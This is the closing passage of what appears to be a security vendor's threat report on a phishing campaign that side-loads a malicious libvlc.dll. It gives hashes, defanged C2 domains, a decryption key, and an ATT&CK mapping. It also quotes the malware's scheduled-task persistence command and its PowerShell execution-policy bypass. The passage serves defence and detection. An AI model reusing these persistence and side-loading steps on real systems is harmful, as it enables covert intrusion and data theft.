  • lake (libvlc.dll) – 2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d
  • vlc.log – 89ec9f19958a442e9e3dd5c96562c61229132f3acb539a6b919c15830f403553
  • Decrypted Shellcode – 8b6acc087e403b913254dd7d99f09136dc54fa45cf3029a8566151120d34d1c2

Scheduled Task

saps "C:\Windows\Tasks\Winver" -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "C:\Windows\Tasks\vlc", '/f';

Network Indicators

  • expouav[.]org – Dropping website
  • roseserve[.]org – C2 server

Mutant Object

Sessions\1\BaseNamedObjects\ghjghkj

Detailed MITRE ATT&CK® Mapping

Each entry lists the MITRE ID and technique, the confirmed procedure, and the evidence observed.

  • T1566.001 – Spear-phishing Attachment. LNK file distributed as conference invitation. Evidence: File: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk (SHA-256: 341f27419becc…etc.)
  • T1059.001 – PowerShell. LNK file executes PowerShell with bypass and stealth parameters. Evidence: Command: -ep 1;$ProgressPreference = 'SilentlyContinue'
  • T1105 – Ingress Tool Transfer. PowerShell downloads five files from delivery infrastructure. Evidence: Source: expouav[.]org via Wget
  • T1036.005 – Match Legitimate Name or Location. Files renamed to legitimate Windows binary names. Evidence: lama → vlc.exe, dalai → Winver.exe, lake → libvlc.dll
  • T1027 – Obfuscated Files or Information. Shellcode encrypted and stored as a log file. Evidence: File: vlc.log with decryption key 76bhu93FGRjZX5hj876bhu93FGRjX5
  • T1574.002 – DLL Side-Loading. VLC Media Player loads malicious libvlc.dll. Evidence: Host: vlc.exe, Malicious: libvlc.dll (SHA-256: 2cd2a4f1fc…etc.)
  • T1055 – Process Injection. Shellcode injected into VLC player memory space. Evidence: Target: VLC process, Payload: Decrypted x86 PE (SHA-256: 8b6acc087e…etc.)
  • T1053.005 – Scheduled Task. PowerShell creates persistent scheduled task. Evidence: Command: saps "C:\Windows\Tasks\Winver" -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport'
  • T1140 – Deobfuscate/Decode Files or Information. Runtime shellcode decryption within libvlc.dll. Evidence: Input: vlc.log, Output: x86 PE (139.37 KB)
  • T1070.006 – Timestomp. Compilation timestamp manipulation for anti-forensics. Evidence: Backdated to Fri Jul 26 09:12:19 2024 vs. actual campaign timeline (2025)
  • T1562.001 – Disable or Modify Tools. PowerShell execution policy bypass. Evidence: Parameter: -ep 1 (execution policy bypass)
  • T1082 – System Information Discovery. System profiling via Windows APIs. Evidence: APIs: GetComputerNameW, GetUserNameW, firmware information collection
  • T1124 – System Time Discovery. System time and performance counter queries. Evidence: Purpose: sandboxing evasion and timing analysis
  • T1497 – Virtualization/Sandbox Evasion. Processor feature detection for environment analysis. Evidence: Checks: CPU capabilities, virtualization features
  • T1113 – Screen Capture. Screenshot collection and processing. Evidence: APIs: CreateStreamOnHGlobal, GetSystemMetrics(SM_CYSCREEN/SM_CXSCREEN)
  • T1071.001 – Web Protocols. HTTPS communication with C2 server. Evidence: C2: roseserve[.]org, Method: HTTP POST to /post endpoint
  • T1573.001 – Symmetric Cryptography. Encrypted C2 communications. Evidence: User-Agent: Mozilla/5.0 for traffic blending
  • T1132.001 – Standard Encoding. Structured command parsing with delimiters. Evidence: Parser: strtok function with $ delimiter
  • T1102.002 – Bidirectional Communication. Command execution and data exfiltration. Evidence: Commands: 3Up3, 3gnfm9, 3gjdfghj6, 3ngjfng5, 3CRT3, 3APC3, 3SC3
  • T1041 – Exfiltration Over C2 Channel. System data and screenshots transmitted to C2. Evidence: Channel: HTTPS to roseserve[.]org
  • T1583.001 – Acquire Infrastructure. Custom domains with legitimate site impersonation. Evidence: Domains: expouav[.]org (mimics waset.org), roseserve[.]org (mimics pardus.org.tr)


About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
